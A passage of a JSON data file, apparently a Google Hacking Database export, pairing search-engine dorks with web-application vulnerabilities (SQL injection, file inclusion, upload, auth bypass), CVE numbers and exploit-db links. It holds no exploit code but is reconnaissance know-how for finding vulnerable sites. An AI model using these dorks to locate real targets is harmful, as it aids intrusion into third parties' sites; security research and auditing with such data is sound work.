Group\"", "long description": "CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: http://www.exploit-db.com/exploits/6142", "submited": "2010-11-15", "request": "\"Powered by CMScout 2005 CMScout Group\"", "id": 2109}, {"short description": "inurl:test.php Powered by TalkBack", "long description": "TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: http://www.exploit-db.com/exploits/9095", "submited": "2010-11-15", "request": "inurl:test.php Powered by TalkBack", "id": 2111}, {"short description": "Maian Gallery v2.0 Copyright 2006-2008 Maian Script World. All Rights Reserved.", "long description": "Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6049", "submited": "2010-11-15", "request": "Maian Gallery v2.0 Copyright 2006-2008 Maian Script World. All Rights Reserved.", "id": 2112}, {"short description": "\"Powered by Ovidentia\"", "long description": "Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: http://www.exploit-db.com/exploits/6232", "submited": "2010-11-15", "request": "\"Powered by Ovidentia\"", "id": 2114}, {"short description": "team5 studio all rights reserved site:cn", "long description": "Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: http://www.exploit-db.com/exploits/7982", "submited": "2010-11-15", "request": "team5 studio all rights reserved site:cn", "id": 2115}, {"short description": "allintext:\" If you would like to contact us, our email address is\" traffic", "long description": "Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: http://www.exploit-db.com/exploits/4187", "submited": "2010-11-15", "request": "allintext:\" If you would like to contact us, our email address is\" traffic", "id": 2116}, {"short description": "\"powered by phpGreetCards\"", "long description": "phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: http://www.exploit-db.com/exploits/7561", "submited": "2010-11-15", "request": "\"powered by phpGreetCards\"", "id": 2117}, {"short description": "powered by apt-webservice ;apt-webshop-system v3.0", "long description": "APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14528", "submited": "2010-11-15", "request": "powered by apt-webservice ;apt-webshop-system v3.0", "id": 2118}, {"short description": "Maian Music v1.0. Copyright 2007-2008 Maian Script World. All Rights Reserved.", "long description": "Maian Music 1.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6051", "submited": "2010-11-15", "request": "Maian Music v1.0. Copyright 2007-2008 Maian Script World. All Rights Reserved.", "id": 2121}, {"short description": "inurl:/wp-content/plugins/wpSS/", "long description": "Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: http://www.exploit-db.com/exploits/5486", "submited": "2010-11-15", "request": "inurl:/wp-content/plugins/wpSS/", "id": 2123}, {"short description": "\"Powerd by www.e-webtech.com\"", "long description": "e-webtech (new.asp?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12547", "submited": "2010-11-15", "request": "\"Powerd by www.e-webtech.com\"", "id": 2125}, {"short description": "inurl:inc_billboardmanager.asp?ItemID=", "long description": "DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7791", "submited": "2010-11-15", "request": "inurl:inc_billboardmanager.asp?ItemID=", "id": 2126}, {"short description": "allinurl :\"modules/recipe\"", "long description": "XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5473", "submited": "2010-11-15", "request": "allinurl :\"modules/recipe\"", "id": 2127}, {"short description": "\"powered by php advanced transfer manager\"", "long description": "phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: http://www.exploit-db.com/exploits/3918", "submited": "2010-11-15", "request": "\"powered by php advanced transfer manager\"", "id": 2129}, {"short description": "\"Powered by GeN4\"", "long description": "PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14086", "submited": "2010-11-15", "request": "\"Powered by GeN4\"", "id": 2130}, {"short description": "\"Powered By Gravity Board X v2.0 BETA\"", "long description": "Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: http://www.exploit-db.com/exploits/8350", "submited": "2010-11-15", "request": "\"Powered By Gravity Board X v2.0 BETA\"", "id": 2131}, {"short description": "inurl:com_flippingbook", "long description": "Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: http://www.exploit-db.com/exploits/5484", "submited": "2010-11-15", "request": "inurl:com_flippingbook", "id": 2132}, {"short description": "\"Help desk software by United Web Coders rev. 3.0.640\"", "long description": "Trouble Ticket Software ttx.cgi Remote File Download: http://www.exploit-db.com/exploits/11823", "submited": "2010-11-15", "request": "\"Help desk software by United Web Coders rev. 3.0.640\"", "id": 2133}, {"short description": "\"Powered by  vlBook 1.21\"", "long description": "vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: http://www.exploit-db.com/exploits/5529", "submited": "2010-11-15", "request": "\"Powered by  vlBook 1.21\"", "id": 2135}, {"short description": "Copyright Rotator 2008", "long description": "YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6949", "submited": "2010-11-15", "request": "Copyright Rotator 2008", "id": 2136}, {"short description": "inurl:tr.php?id= Reminder Service", "long description": "YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: http://www.exploit-db.com/exploits/6943", "submited": "2010-11-15", "request": "inurl:tr.php?id= Reminder Service", "id": 2137}, {"short description": "\"Jevonweb Guestbook\"", "long description": "Jevonweb Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10665", "submited": "2010-11-15", "request": "\"Jevonweb Guestbook\"", "id": 2138}, {"short description": "inurl:inc_contactusmanager.asp", "long description": "DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7768", "submited": "2010-11-15", "request": "inurl:inc_contactusmanager.asp", "id": 2139}, {"short description": "inurl:com_neorecruit", "long description": "Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14570", "submited": "2010-11-15", "request": "inurl:com_neorecruit", "id": 2140}, {"short description": "\"index.php?option=com_mdigg\"", "long description": "Joomla Component com_mdigg SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10847", "submited": "2010-11-15", "request": "\"index.php?option=com_mdigg\"", "id": 2141}, {"short description": "\"Uploader by CeleronDude.\"", "long description": "Uploader by CeleronDude 5.3.0 - Upload Vulnerability: http://www.exploit-db.com/exploits/11166", "submited": "2010-11-15", "request": "\"Uploader by CeleronDude.\"", "id": 2142}, {"short description": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "long description": "PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: http://www.exploit-db.com/exploits/2428", "submited": "2010-11-15", "request": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "id": 2143}, {"short description": "'SEO by NuSEO.PHP'", "long description": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: http://www.exploit-db.com/exploits/4512", "submited": "2010-11-15", "request": "&#039;SEO by NuSEO.PHP&#039;", "id": 2144}, {"short description": "intext:\"Web design by goffgrafix.com\"", "long description": "goffgrafix Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12712", "submited": "2010-11-15", "request": "intext:\"Web design by goffgrafix.com\"", "id": 2145}, {"short description": "powered by zeeways", "long description": "Zeeways Technology (product_desc.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11047", "submited": "2010-11-15", "request": "powered by zeeways", "id": 2146}, {"short description": "\"Welcome to Exponent CMS\" | \"my new exponent site\"  inurl:articlemodule", "long description": "Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11349", "submited": "2010-11-15", "request": "\"Welcome to Exponent CMS\" | \"my new exponent site\"  inurl:articlemodule", "id": 2147}, {"short description": "intitle:\"Shorty (Beta)\"", "long description": "Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/9419", "submited": "2010-11-15", "request": "intitle:\"Shorty (Beta)\"", "id": 2148}, {"short description": "inurl:index.php?mod=ConcoursPhoto", "long description": "KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: http://www.exploit-db.com/exploits/5353", "submited": "2010-11-15", "request": "inurl:index.php?mod=ConcoursPhoto", "id": 2150}, {"short description": "\"Copyright MaxiSepet \"", "long description": "MaxiSepet 1.0 (link) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/1900", "submited": "2010-11-15", "request": "\"Copyright MaxiSepet \"", "id": 2151}, {"short description": "Powered by sabros.us", "long description": "sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: http://www.exploit-db.com/exploits/5360", "submited": "2010-11-15", "request": "Powered by sabros.us", "id": 2152}, {"short description": "inurl:inc_registrationmanager.asp", "long description": "DMXReady Registration Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7784", "submited": "2010-11-15", "request": "inurl:inc_registrationmanager.asp", "id": 2154}, {"short description": "\"Powered by Drumbeat\" inurl:index02.php", "long description": "Drumbeat CMS SQL Injection: http://www.exploit-db.com/exploits/10575", "submited": "2010-11-15", "request": "\"Powered by Drumbeat\" inurl:index02.php", "id": 2155}, {"short description": "\"Designed &amp; Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "long description": "IranMC Arad Center (news.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6712", "submited": "2010-11-15", "request": "\"Designed &amp; Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "id": 2156}, {"short description": "\"You have not provided a survey identification number\"", "long description": "LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: http://www.exploit-db.com/exploits/4544", "submited": "2010-11-15", "request": "\"You have not provided a survey identification number\"", "id": 2157}, {"short description": "\"Powered by SocketMail Lite version 2.2.8. Copyright 2002-2006\"", "long description": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: http://www.exploit-db.com/exploits/4554", "submited": "2010-11-15", "request": "\"Powered by SocketMail Lite version 2.2.8. Copyright 2002-2006\"", "id": 2158}, {"short description": "\"Powered by ComicShout\"", "long description": "ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: http://www.exploit-db.com/exploits/5713", "submited": "2010-11-15", "request": "\"Powered by ComicShout\"", "id": 2159}, {"short description": "powered by Pixaria. Gallery", "long description": "Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: http://www.exploit-db.com/exploits/3733", "submited": "2010-11-15", "request": "powered by Pixaria. Gallery", "id": 2160}, {"short description": "\"Powered by FlashGameScript\"", "long description": "FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: http://www.exploit-db.com/exploits/4161", "submited": "2010-11-15", "request": "\"Powered by FlashGameScript\"", "id": 2161}, {"short description": "index.php?option=com_ongallery", "long description": "Joomla Component OnGallery SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14659", "submited": "2010-11-15", "request": "index.php?option=com_ongallery", "id": 2163}, {"short description": "Powered by WHMCompleteSolution - OR   inurl:WHMCS   OR     announcements.php", "long description": "WHMCS Control 2 (announcements.php) SQL Injection: http://www.exploit-db.com/exploits/12481", "submited": "2010-11-15", "request": "Powered by WHMCompleteSolution - OR   inurl:WHMCS   OR     announcements.php", "id": 2164}, {"short description": "inurl:inc_catalogmanager.asp", "long description": "DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7766", "submited": "2010-11-15", "request": "inurl:inc_catalogmanager.asp", "id": 2165}, {"short description": "\"This website is powered by Trio\"", "long description": "TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: http://www.exploit-db.com/exploits/6141", "submited": "2010-11-15", "request": "\"This website is powered by Trio\"", "id": 2166}, {"short description": "content_by_cat.asp?contentid ''catid''", "long description": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6590", "submited": "2010-11-15", "request": "content_by_cat.asp?contentid &#039;&#039;catid&#039;&#039;", "id": 2168}, {"short description": "allinurl: \"pollBooth.php?op=results\"pollID", "long description": "Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5436", "submited": "2010-11-15", "request": "allinurl: \"pollBooth.php?op=results\"pollID", "id": 2169}, {"short description": "browse_videos.php?", "long description": "phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: http://www.exploit-db.com/exploits/4153", "submited": "2010-11-15", "request": "browse_videos.php?", "id": 2170}, {"short description": "inurl:JBSPro", "long description": "JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: http://www.exploit-db.com/exploits/1571", "submited": "2010-11-15", "request": "inurl:JBSPro", "id": 2172}, {"short description": "inurl:inc_joblistingmanager.asp", "long description": "DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7771", "submited": "2010-11-15", "request": "inurl:inc_joblistingmanager.asp", "id": 2174}, {"short description": "\"Factux le facturier libre V 1.1.5\"", "long description": "Factux LFI Vulnerability: http://www.exploit-db.com/exploits/12521", "submited": "2010-11-15", "request": "\"Factux le facturier libre V 1.1.5\"", "id": 2175}, {"short description": "Maintained with the Ocean12 Contact Manager Pro v1.02", "long description": "Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: http://www.exploit-db.com/exploits/7244", "submited": "2010-11-15", "request": "Maintained with the Ocean12 Contact Manager Pro v1.02", "id": 2176}, {"short description": "buyers_subcategories.php?IndustryID=", "long description": "Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12245", "submited": "2010-11-15", "request": "buyers_subcategories.php?IndustryID=", "id": 2177}, {"short description": "\"Powered by Minerva\"", "long description": "Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: http://www.exploit-db.com/exploits/2429", "submited": "2010-11-15", "request": "\"Powered by Minerva\"", "id": 2178}, {"short description": "inurl:\"izle.asp?oyun=\"", "long description": "FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: http://www.exploit-db.com/exploits/6453", "submited": "2010-11-15", "request": "inurl:\"izle.asp?oyun=\"", "id": 2179}, {"short description": "Copyright Viral Marketing 2008", "long description": "YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6941", "submited": "2010-11-15", "request": "Copyright Viral Marketing 2008", "id": 2180}, {"short description": "inurl:\"IDFM=\" \"form.php\"", "long description": "360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: http://www.exploit-db.com/exploits/4944", "submited": "2010-11-15", "request": "inurl:\"IDFM=\" \"form.php\"", "id": 2181}, {"short description": "inurl:inc_newsmanager.asp", "long description": "DMXReady News Manager 1.1 Arbitrary Category Change Vuln: http://www.exploit-db.com/exploits/7752", "submited": "2010-11-15", "request": "inurl:inc_newsmanager.asp", "id": 2182}, {"short description": "Powered by XAOS systems", "long description": "XAOS CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14469", "submited": "2010-11-15", "request": "Powered by XAOS systems", "id": 2183}, {"short description": "inurl:inc_documentlibrarymanager.asp", "long description": "DMXReady Document Library Manager 1.1 Contents Change Vuln: http://www.exploit-db.com/exploits/7769", "submited": "2010-11-15", "request": "inurl:inc_documentlibrarymanager.asp", "id": 2184}, {"short description": "inurl:inc_photogallerymanager.asp", "long description": "DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7783", "submited": "2010-11-15", "request": "inurl:inc_photogallerymanager.asp", "id": 2185}, {"short description": "Powered by Arctic v2.0.0", "long description": "Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: http://www.exploit-db.com/exploits/6097", "submited": "2010-11-15", "request": "Powered by Arctic v2.0.0", "id": 2186}, {"short description": "inurl:\"phpRaid\"  \"phpRaid\" \"roster.php?Sort=Race\"", "long description": "phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: http://www.exploit-db.com/exploits/3528", "submited": "2010-11-15", "request": "inurl:\"phpRaid\"  \"phpRaid\" \"roster.php?Sort=Race\"", "id": 2187}, {"short description": "inurl:\"classifieds.php?cat=\"", "long description": "BM Classifieds Ads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10314", "submited": "2010-11-15", "request": "inurl:\"classifieds.php?cat=\"", "id": 2189}, {"short description": "Powered by: Zanfi Solutions", "long description": "Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: http://www.exploit-db.com/exploits/6413", "submited": "2010-11-15", "request": "Powered by: Zanfi Solutions", "id": 2190}, {"short description": "inurl:\"index.php?option=com_jequoteform\"", "long description": "Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: http://www.exploit-db.com/exploits/12607", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jequoteform\"", "id": 2191}, {"short description": "\"Powered by SiteX 0.7 Beta\"", "long description": "SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: http://www.exploit-db.com/exploits/8816", "submited": "2010-11-15", "request": "\"Powered by SiteX 0.7 Beta\"", "id": 2192}, {"short description": "inurl:\"freshlinks_panel/index.php?linkid\"", "long description": "PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: http://www.exploit-db.com/exploits/6620", "submited": "2010-11-15", "request": "inurl:\"freshlinks_panel/index.php?linkid\"", "id": 2193}, {"short description": "Powered By WebSihirbazi", "long description": "WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 2007-6556: http://www.exploit-db.com/exploits/4777", "submited": "2010-11-15", "request": "Powered By WebSihirbazi", "id": 2194}, {"short description": "\"Software Categories\" \"Featured Resources\" \"Search\"", "long description": "HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: http://www.exploit-db.com/exploits/4633", "submited": "2010-11-15", "request": "\"Software Categories\" \"Featured Resources\" \"Search\"", "id": 2196}, {"short description": "\"Website Powered By Creative SplashWorks - SplashSite\"", "long description": "Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11300", "submited": "2010-11-15", "request": "\"Website Powered By Creative SplashWorks - SplashSite\"", "id": 2197}, {"short description": "inurl:inc_paypalstoremanager.asp", "long description": "DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7782", "submited": "2010-11-15", "request": "inurl:inc_paypalstoremanager.asp", "id": 2199}, {"short description": "Powered By phpCOIN 1.2.3", "long description": "phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: http://www.exploit-db.com/exploits/2254", "submited": "2010-11-15", "request": "Powered By phpCOIN 1.2.3", "id": 2200}, {"short description": "inurl:\"index.php?com_remository\"", "long description": "Joomla Component (com_remository) Remote Upload File: http://www.exploit-db.com/exploits/14811", "submited": "2010-11-15", "request": "inurl:\"index.php?com_remository\"", "id": 2201}, {"short description": "Powered By: Simplicity oF Upload", "long description": "Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: http://www.exploit-db.com/exploits/10568", "submited": "2010-11-15", "request": "Powered By: Simplicity oF Upload", "id": 2202}, {"short description": "\"Developed by Quate.net.\"", "long description": "Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability - CVE: 2008-1963: http://www.exploit-db.com/exploits/5463", "submited": "2010-11-15", "request": "\"Developed by Quate.net.\"", "id": 2203}, {"short description": "allinurl:directory.php?ax=list", "long description": "Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: http://www.exploit-db.com/exploits/4185", "submited": "2010-11-15", "request": "allinurl:directory.php?ax=list", "id": 2206}, {"short description": "inurl:w3.php?nodeId=", "long description": "Aspect Ratio CMS Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15205", "submited": "2010-11-15", "request": "inurl:w3.php?nodeId=", "id": 2207}, {"short description": "VS-Gastebuch V.", "long description": "S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: http://www.exploit-db.com/exploits/3328", "submited": "2010-11-15", "request": "VS-Gastebuch V.", "id": 2208}, {"short description": "Uebimiau Webmail v3.2.0-1.8", "long description": "Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: http://www.exploit-db.com/exploits/8944", "submited": "2010-11-15", "request": "Uebimiau Webmail v3.2.0-1.8", "id": 2209}, {"short description": "2007 by Lama Software - Accomm Solutions GmbH &amp; Co. KG", "long description": "Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: http://www.exploit-db.com/exploits/4955", "submited": "2010-11-15", "request": "2007 by Lama Software - Accomm Solutions GmbH &amp; Co. KG", "id": 2210}, {"short description": "\"ATutor 1.6.4\"", "long description": "ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: http://www.exploit-db.com/exploits/11685", "submited": "2010-11-15", "request": "\"ATutor 1.6.4\"", "id": 2211}, {"short description": "\"Search | Invite | Mail | Blog | Forum\"", "long description": "Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: http://www.exploit-db.com/exploits/4622", "submited": "2010-11-15", "request": "\"Search | Invite | Mail | Blog | Forum\"", "id": 2213}, {"short description": "inurl:\"index.php?option=com_portfolio\"", "long description": "Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5139", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_portfolio\"", "id": 2214}, {"short description": "Powered by Article DashBoard", "long description": "Article Friendly SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11530", "submited": "2010-11-15", "request": "Powered by Article DashBoard", "id": 2215}, {"short description": "elkagroup - Image Gallery v1.0 -  All right reserved", "long description": "elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: http://www.exploit-db.com/exploits/8514", "submited": "2010-11-15", "request": "elkagroup - Image Gallery v1.0 -  All right reserved", "id": 2216}, {"short description": "inurl:post.php?Category=Garage", "long description": "GarageSales Remote Upload Vulnerability: http://www.exploit-db.com/exploits/12128", "submited": "2010-11-15", "request": "inurl:post.php?Category=Garage", "id": 2219}, {"short description": "intext:\"Powered by CLscript.com\"", "long description": "CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: http://www.exploit-db.com/exploits/12423", "submited": "2010-11-15", "request": "intext:\"Powered by CLscript.com\"", "id": 2221}, {"short description": "\"Send amazing greetings to your friends and relative!\"", "long description": "greeting card Remote Upload Vulnerability: http://www.exploit-db.com/exploits/13751", "submited": "2010-11-15", "request": "\"Send amazing greetings to your friends and relative!\"", "id": 2222}, {"short description": "inurl:\"index.php?option=com_oziogallery\"", "long description": "Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: http://www.exploit-db.com/exploits/14462", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_oziogallery\"", "id": 2223}, {"short description": "\"Powered by Content Injector v1.53\"", "long description": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: http://www.exploit-db.com/exploits/4706", "submited": "2010-11-15", "request": "\"Powered by Content Injector v1.53\"", "id": 2224}, {"short description": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "long description": "DotNetNuke Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12700", "submited": "2010-11-15", "request": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "id": 2225}, {"short description": "inurl:\"click.php?hostid=\"", "long description": "Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: http://www.exploit-db.com/exploits/6909", "submited": "2010-11-15", "request": "inurl:\"click.php?hostid=\"", "id": 2226}, {"short description": "inurl:/tiny_mce/plugins/filemanager/", "long description": "TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15194", "submited": "2010-11-15", "request": "inurl:/tiny_mce/plugins/filemanager/", "id": 2227}, {"short description": "inurl:\"search_results.php?browse=1\"", "long description": "SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: http://www.exploit-db.com/exploits/12438", "submited": "2010-11-15", "request": "inurl:\"search_results.php?browse=1\"", "id": 2229}, {"short description": "\"powered by fuzzylime\"", "long description": "fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: http://www.exploit-db.com/exploits/5260", "submited": "2010-11-15", "request": "\"powered by fuzzylime\"", "id": 2230}, {"short description": "Powered by ThinkAdmin", "long description": "ThinkAdmin (page.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11296", "submited": "2010-11-15", "request": "Powered by ThinkAdmin", "id": 2231}, {"short description": "phpBazar Ver. 2.1.0", "long description": "phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: http://www.exploit-db.com/exploits/10233", "submited": "2010-11-15", "request": "phpBazar Ver. 2.1.0", "id": 2232}, {"short description": "inurl:gotourl.php?id=", "long description": "PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: http://www.exploit-db.com/exploits/6839", "submited": "2010-11-15", "request": "inurl:gotourl.php?id=", "id": 2233}, {"short description": "inurl:\"module=helpcenter\"", "long description": "Help Center Live 2.0.6(module=helpcenter&amp;file=) Local File Inclusion - CVE: 2010-1652: http://www.exploit-db.com/exploits/12421", "submited": "2010-11-15", "request": "inurl:\"module=helpcenter\"", "id": 2234}, {"short description": "Powered By PHPhotoalbum", "long description": "PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: http://www.exploit-db.com/exploits/10584", "submited": "2010-11-15", "request": "Powered By PHPhotoalbum", "id": 2235}, {"short description": "\"Eyeland Studio Inc. All Rights Reserved.\"", "long description": "Eyeland Studio Inc. SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13855", "submited": "2010-11-15", "request": "\"Eyeland Studio Inc. All Rights Reserved.\"", "id": 2236}, {"short description": "\"Gallery powered by fMoblog\"", "long description": "Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: http://www.exploit-db.com/exploits/8229", "submited": "2010-11-15", "request": "\"Gallery powered by fMoblog\"", "id": 2237}, {"short description": "\"Powered by Orca Interactive Forum Script\"", "long description": "Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: http://www.exploit-db.com/exploits/5955", "submited": "2010-11-15", "request": "\"Powered by Orca Interactive Forum Script\"", "id": 2239}, {"short description": "Powered by Info Fisier", "long description": "Info Fisier v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10726", "submited": "2010-11-15", "request": "Powered by Info Fisier", "id": 2240}, {"short description": "inurl:\"browsecats.php?cid=\"", "long description": "SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: http://www.exploit-db.com/exploits/12439", "submited": "2010-11-15", "request": "inurl:\"browsecats.php?cid=\"", "id": 2242}, {"short description": "\"Powered by MySpace Content Zone\"", "long description": "MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: http://www.exploit-db.com/exploits/4741", "submited": "2010-11-15", "request": "\"Powered by MySpace Content Zone\"", "id": 2243}, {"short description": "allinurl: \"com_actualite\"", "long description": "Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: http://www.exploit-db.com/exploits/5337", "submited": "2010-11-15", "request": "allinurl: \"com_actualite\"", "id": 2244}, {"short description": "inurl:\"com_book\"", "long description": "Joomla Component com_book SQL injection Vulnerability: http://www.exploit-db.com/exploits/11213", "submited": "2010-11-15", "request": "inurl:\"com_book\"", "id": 2245}, {"short description": "\"powered by AllMyGuests\"", "long description": "AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: http://www.exploit-db.com/exploits/5469", "submited": "2010-11-15", "request": "\"powered by AllMyGuests\"", "id": 2246}, {"short description": "allinurl : /web3news/", "long description": "Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: http://www.exploit-db.com/exploits/2269", "submited": "2010-11-15", "request": "allinurl : /web3news/", "id": 2248}, {"short description": "Powered by BoutikOne", "long description": "BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: http://www.exploit-db.com/exploits/15049", "submited": "2010-11-15", "request": "Powered by BoutikOne", "id": 2249}, {"short description": "\" Powered by Xpoze \"", "long description": "Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: http://www.exploit-db.com/exploits/7432", "submited": "2010-11-15", "request": "\" Powered by Xpoze \"", "id": 2251}, {"short description": "Powered by ArticleMS from ArticleTrader", "long description": "Article Management System 2.1.2 Reinstall Vulnerability: http://www.exploit-db.com/exploits/12858", "submited": "2010-11-15", "request": "Powered by ArticleMS from ArticleTrader", "id": 2253}, {"short description": "allinurl:\"macgurublog.php?uid=\"", "long description": "e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: http://www.exploit-db.com/exploits/6856", "submited": "2010-11-15", "request": "allinurl:\"macgurublog.php?uid=\"", "id": 2254}, {"short description": "\"powered by 